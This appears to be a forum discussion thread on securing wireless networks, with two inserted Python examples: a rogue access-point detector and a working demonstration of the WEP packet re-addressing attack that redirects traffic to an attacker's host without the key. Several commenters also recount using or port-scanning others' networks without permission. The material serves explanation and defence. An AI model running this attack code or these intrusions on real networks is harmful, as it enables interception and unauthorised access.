Risk Management of Wireless Networks
An anonymous reader writes "As wireless becomes a bigger part of our networks, those of us charged with maintaining them find ourselves also responsible for keeping drive-by script kiddies with a Pringles can out. BankInfoSecurity.com is running an excellent article on identifying and mitigating risks on wireless networks. The article was written by members of the Office of the Comptroller of the Currency (OCC) for banks, but it's applicable to any network environment and clearly lays out all the key steps to protecting wireless systems." There's nothing new here, really, but it's a good overview of issues to keep in mind when building a wireless net, as well as a good security plan starting point.
Just have your wireless devices set to a DMZ that opens to one page, a VPN portal. Then you have a wireless connection, with VPN providing your security. Voila...a little bit more cumbersome, but isn't your network integrity worth it?
The switch has all inline power ports to power the APs, which may or may not be directly connected. Each AP automatically creates an IPSEC tunnel back to the switch. The switch supports every auth method under the sun (EAP-TTLS being generally most secure) when combined with 802.1X (which includes dynamic WEP/WPA 2.0). The switch itself supports a per-user firewall, integrated, signature-based IDS (that detects things like monkeyjack and netstumbler), and terminates 2 Gbps of IPSEC (which includes the IPSEC client running on each user's machine).
All of this for a couple of grand. Secure wireless is possible, the market is demanding it, and vendors have come to meet that demand.
I agree 100%.
The hoopla about physical access security obscures the point that *all* internet traffic and most intranet traffic is viewable by others. It is a good idea to assume that all your networks are open and to use VPN, ssh, etc. to secure your data. And *never* send plain-text passwords.
If you lock your data down under this assumption (that all network traffic may be intercepted) the impetus for clunky and insecure wireless access restrictions is much diminished.
used to use WiFi between its checkouts and inventory system. No encryption, SSID broadcasts were switched on and everything, to the extent that we used to sit in the car park and surf the web via their connection for hours on end on Saturday afternoons.
This was a good 18 months ago though. I'd assume they've changed it now. I certainly made a point of telling them why I wasn't shopping there any more, rather than doing the whole 'your network is totally unsecure and I found out why' thing and getting myself arrested...
If you are responsible for a company's security, you should regularly search for wireless nodes within your organization which you are not aware of WHETHER OR NOT you are using wireless as policy.
I have been asked to assess companies and offered a wireless audit. They said "we don't use wireless". I checked anyway, and it turned out they DID have wireless (but didn't know about it) thanks, in one instance, to a laptop acting as an AP and, in another, to a sysadmin who figured he'd plug in a wireless AP with built-in switch instead of a hub or switch, and wireless was turned on. This is all the more problematic as the laptop and wireless device were both inside the firewall and therefore represented a major hole.
Intruders may also leave wireless devices behind to save coming onto the site for subsequent eavesdropping. That is, they will bring your network to them rather than bringing themselves to your network.
In any case, fire up your stumbling application, a GOOD antenna and have a look around your own environment. You may be surprised what you see!
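The "fire up your stumbling application and have a look around" advice above, turned into the comparison step that a scan by itself does not give you. This is an added example, not code from the poster or from any stumbler: it parses a constructed, iwlist-style scan listing (the BSSIDs, SSIDs and signal values are made up), checks every cell against an inventory of sanctioned APs, and flags the three things the post is worried about: an unknown BSSID advertising the corporate SSID (the laptop-as-AP or rogue-switch case), an open network inside the building, and anything that is encrypted but carries no WPA information element, which in practice means WEP. Inventory and SSID names are assumptions for the demo.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample in the layout `iwlist <if> scan` prints; not a real capture.
SCAN_OUTPUT = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    Channel:6
                    Quality=70/70  Signal level=-35 dBm
                    Encryption key:on
                    ESSID:"CORP-WIFI"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 02 - Address: 00:11:22:33:44:66
                    Channel:11
                    Quality=50/70  Signal level=-60 dBm
                    Encryption key:on
                    ESSID:"CORP-WIFI"
          Cell 03 - Address: 00:13:10:AA:BB:CC
                    Channel:1
                    Quality=65/70  Signal level=-40 dBm
                    Encryption key:off
                    ESSID:"linksys"
          Cell 04 - Address: 00:11:22:33:44:77
                    Channel:6
                    Quality=20/70  Signal level=-88 dBm
                    Encryption key:on
                    ESSID:"CORP-WIFI"
                    IE: IEEE 802.11i/WPA2 Version 1
"""

# Assumed inventory: BSSID -> SSID it is allowed to broadcast.
KNOWN_APS: Dict[str, str] = {
    "00:11:22:33:44:55": "CORP-WIFI",
    "00:11:22:33:44:77": "CORP-WIFI",
}
CORP_SSIDS: Set[str] = {"CORP-WIFI"}


@dataclass
class Cell:
    bssid: str
    essid: str = ""
    channel: Optional[int] = None
    signal_dbm: Optional[int] = None
    encrypted: bool = False
    wpa: bool = False          # True if a WPA/RSN IE was seen


def parse_iwlist(text: str) -> List[Cell]:
    """Turn iwlist-style output into Cell records, one per 'Cell NN' block."""
    cells: List[Cell] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})", line)
        if m:
            cells.append(Cell(bssid=m.group(1).upper()))
            continue
        if not cells:
            continue                       # header lines before the first cell
        cell = cells[-1]
        if line.startswith("ESSID:"):
            cell.essid = line[len("ESSID:"):].strip('"')
        elif line.startswith("Channel:"):
            cell.channel = int(line.split(":", 1)[1])
        elif "Signal level=" in line:
            cell.signal_dbm = int(re.search(r"Signal level=(-?\d+)", line).group(1))
        elif line.startswith("Encryption key:"):
            cell.encrypted = line.endswith("on")
        elif line.startswith("IE:") and "WPA" in line:
            cell.wpa = True
    return cells


def classify(cells: List[Cell], known: Dict[str, str],
             corp_ssids: Set[str]) -> List[Tuple[str, str, str]]:
    """Return (bssid, severity, reason) for every cell worth walking over to."""
    findings = []
    for c in cells:
        if c.bssid in known:
            if c.essid != known[c.bssid]:
                findings.append((c.bssid, "high", f"sanctioned AP advertising {c.essid!r}"))
            continue                       # inventory AP behaving as expected
        if c.essid in corp_ssids:
            findings.append((c.bssid, "high", f"unknown BSSID using corporate SSID {c.essid!r}"))
        elif not c.encrypted:
            findings.append((c.bssid, "medium", f"open network {c.essid!r} at {c.signal_dbm} dBm"))
        elif not c.wpa:
            findings.append((c.bssid, "medium", f"WEP-only network {c.essid!r} at {c.signal_dbm} dBm"))
    return findings


if __name__ == "__main__":
    for bssid, sev, why in classify(parse_iwlist(SCAN_OUTPUT), KNOWN_APS, CORP_SSIDS):
        print(f"[{sev}] {bssid}: {why}")
```

Run it periodically with the real scan piped in; the strong-signal hits against unknown BSSIDs are the ones to physically track down, since a rogue AP plugged into the inside of the firewall will usually be the loudest thing in the building.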
So why not have to VPN in from the WiFi network? What would be the difference from being at home on a crappy Linksys access point?
the government will ever allow sensitive or classified information to go on a wireless link, even if it is "secured".. there's just too much freedom in the air between origin and destination.
Drat, what are we going to do with the $8.5 billion we already spent on the satellites?
But what about your neighbors? From my office upstairs in my house I can see 9 wireless networks. 24 hours to get enough data? That's easy. That is what concerns me. You never know who you live around and they have all the time they want to break it.
From what I've seen most of my neighbors don't use their connection enough to get enough traffic but 1 or 2 do. In a test of AirSnort I got close to 1K interesting packets in 2 days for one network. Given a week or two of a system sitting in a corner I bet I could break it.
This is the main reason I totally dropped wireless in the new house. I had it wired with CAT5 for data everywhere I'd need it. I work a lot from home and have a site-to-site VPN and don't want to compromise that.
Your suggestions are good... But turning off SSID broadcast is overrated. As soon as a client associates I can get that. As soon as they associate I can get a MAC address to clone.
This subject deserves mod points. I don't have any today, so you have to suffer through one of my posts.
If you are running a business with wireless, and you care at all about security, and you allow anything to go over that link unencrypted, you're insane.
The only IP address that should be reachable over your wireless network is the IP address of your IPSec VPN gateway.
Most APs will accept re-addressed packets. This means the perp doesn't have to even crack the keys. All he needs to do is readdress packets to himself over the net and send them back to your AP. Your AP will dutifully decrypt them and send them out over the internet. Port blocked? Use a different one - you're re-addressing the packets anyway.
A.
My first thought was the status screen part of the maintenance / configuration web interface to my router. Have it up, refresh it from time to time and just look at all the MAC addresses. Any clown that can't become familiar enough with 20-30 MAC addresses that are legit to memorize them, thus identifying unwelcome intruders by looking at this screen ... doesn't belong in IT.
... because anybody that can memorize 23 MAC addresses probably isn't going to have too much trouble burning through a 56bit key to get his hands on some of it.
And yes, that is one of the things I check from time to time when I want to reassure myself that my system hasn't been compromised.
But you are right, banks probably shouldn't be using wireless, nor should they allow their home users VPN'ing in to use wireless. WEP is strong enough to protect my pr0n and warez, but it isn't strong enough (IMHO) to protect $14.6B worth of assets.
Glonoinha the MebiByte Slayer
(not only do you have to read my posts, you have to read me replying to my own post).
I realized that I over-simplified the re-addressing problem.
From the UCLA paper:
"Active Attack from Both Ends
The previous attack can be extended further to decrypt arbitrary traffic. In this case, the attacker makes a guess about not the contents, but rather the headers of a packet. This information is usually quite easy to obtain or guess; in particular, all that is necessary to guess is the destination IP address. Armed with this knowledge, the attacker can flip appropriate bits to transform the destination IP address to send the packet to a machine he controls, somewhere in the Internet, and transmit it using a rogue mobile station. Most wireless installations have Internet connectivity; the packet will be successfully decrypted by the access point and forwarded unencrypted through appropriate gateways and routers to the attacker's machine, revealing the plaintext. If a guess can be made about the TCP headers of the packet, it may even be possible to change the destination port on the packet to be port 80, which will allow it to be forwarded through most firewalls."
A.
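The re-addressing attack described two posts up and in the quoted paragraph, carried through in code. This is an added example, not code from the poster or from the paper: it models WEP as RC4 keyed with IV || secret plus a CRC-32 ICV, then shows the attacker side, which never sees the key. Two properties do the work: RC4 is a pure XOR stream, so a delta XORed into the ciphertext lands unchanged in the plaintext, and CRC-32 is affine over XOR (crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length)), so the encrypted ICV can be patched blind. The quoted excerpt does not discuss the IPv4 header checksum, which the attacker also cannot read; a standard way around that is to choose the new destination so that the ones'-complement sum of its two 16-bit halves equals that of the guessed original, leaving the checksum valid untouched, and the example enforces that. The key, IV, addresses and payload are all constructed for the demo.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || secret."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: unkeyed CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + secret, len(body)))


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    """What the AP does: decrypt, verify the ICV, forward the IP packet."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + secret, len(ct)))
    pt, tag = body[:-4], body[-4:]
    if tag != icv(pt):
        raise ValueError("bad ICV")
    return pt


def ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def ip_checksum(header: bytes) -> int:
    """RFC 791 header checksum; returns 0 when a header verifies."""
    s = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return ~s & 0xFFFF


def build_ip_packet(src: bytes, dst: bytes, payload: bytes) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload),
                      0x1234, 0, 64, 6, 0, src, dst)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:] + payload


def checksum_neutral(old_dst: bytes, new_dst: bytes) -> bool:
    """True if swapping old_dst for new_dst leaves the IP checksum valid."""
    def half_sum(a: bytes) -> int:
        s = sum(struct.unpack("!HH", a))
        return (s & 0xFFFF) + (s >> 16)
    return half_sum(old_dst) == half_sum(new_dst)


def redirect_frame(frame: bytes, guessed_dst: bytes, new_dst: bytes) -> bytes:
    """Attacker side, no key needed. The IPv4 destination sits at offset 16."""
    if not checksum_neutral(guessed_dst, new_dst):
        raise ValueError("pick a new destination with the same half-word sum")
    pt_len = len(frame) - 3 - 4
    delta = bytearray(pt_len)
    delta[16:20] = xor(guessed_dst, new_dst)      # flips only the dst bits
    delta = bytes(delta)
    # CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), so this
    # delta applied to the encrypted ICV yields the ICV of the new plaintext.
    icv_delta = xor(icv(delta), icv(bytes(pt_len)))
    return frame[:3] + xor(frame[3:], delta + icv_delta)


def icv_rejects(secret: bytes, frame: bytes) -> bool:
    try:
        wep_decrypt(secret, frame)
    except ValueError:
        return True
    return False


def demo() -> bytes:
    secret = b"\x5e\xc2\x19\x77\x0a"               # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"                           # constructed IV
    victim = build_ip_packet(ip("192.168.1.10"), ip("10.0.0.5"),
                             b"GET /balance HTTP/1.0\r\n")
    frame = wep_encrypt(secret, iv, victim)        # sniffed off the air
    # Attacker guesses the original dst 10.0.0.5 and controls 10.1.0.4:
    # 0x0A00 + 0x0005 == 0x0A01 + 0x0004, so the header checksum survives.
    evil = redirect_frame(frame, ip("10.0.0.5"), ip("10.1.0.4"))
    return wep_decrypt(secret, evil)               # AP accepts and forwards it
```

The decrypted result of `demo()` is the victim's packet with its destination rewritten to the attacker's host and a valid ICV and IP checksum, which is exactly what the AP hands to the upstream router. Nothing here requires recovering keystream or cracking the key; it is a consequence of using a linear checksum under a stream cipher, and it is why the advice in the surrounding posts to treat the wireless link as open and run a real VPN over it is the right one.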
Yeah, I see a lot of people stuck like that with insecure POP, and a lot of people who use the same password for their home account (which is almost always POP only) as they do for their work account. Bad bad bad.
One thing you could do, if you want to be a bit more secure, is to port forward port 110 using SSH to a server at home. Your POP password is still going out in the clear then, but it's going in the clear from your house, which is presumably more secure than going out over open wireless.
the tunnel would be something like this:
ssh -L 110:www.yourhomeserver.com:110 -f -N yourname@www.yourhomeserver.com
Here's a howto that goes into a little more depth.
I gave a friend of mine a wireless card for her laptop as a graduation present, the idea being she could use it when she's at coffee shops offering wireless connections, or in grad school on campus (she doesn't subscribe to broadband). As it turns out, she has a minimum of 4 options to connect to the internet from her apartment at any given time thanks to her careless neighbors.
He'd left it open to facilitate use by visitors, but no longer.
many ISPs do not offer any other option
Use your ISP for connectivity and spend $30-35 a year for a better mail service.
For less than 3 bucks a month, you might even get HTTPS webmail thrown in ... some extra storage ... and one of those "lifetime" domain names that gives you some flexibility regarding additional accounts and spam control.
If email matters to you, it is doubtful you can find an ISP for twice the price that gives you mail security and your current level of non-mail speed and features (how most people pick their providers).
So, for kicks, I took my libretto to the office on my next visit and fired up kismet.
They are wide open. No WEP, Windoze boxes (including the domain controllers) all easily accessible. A quick port scan showed all types of vulnerable services and such. I did not take the time to go further, but figure that getting patient records would not be too difficult.
From the port scans, it seems that this small office is also on the same subnet as other businesses in the area. WTF???
So what is one to do? I dare not tell them what I found, what with the risk of being labeled a terrorist and all. I thought that an anonymous letter to them might be best. But how can I be sure that they ever fix the problem?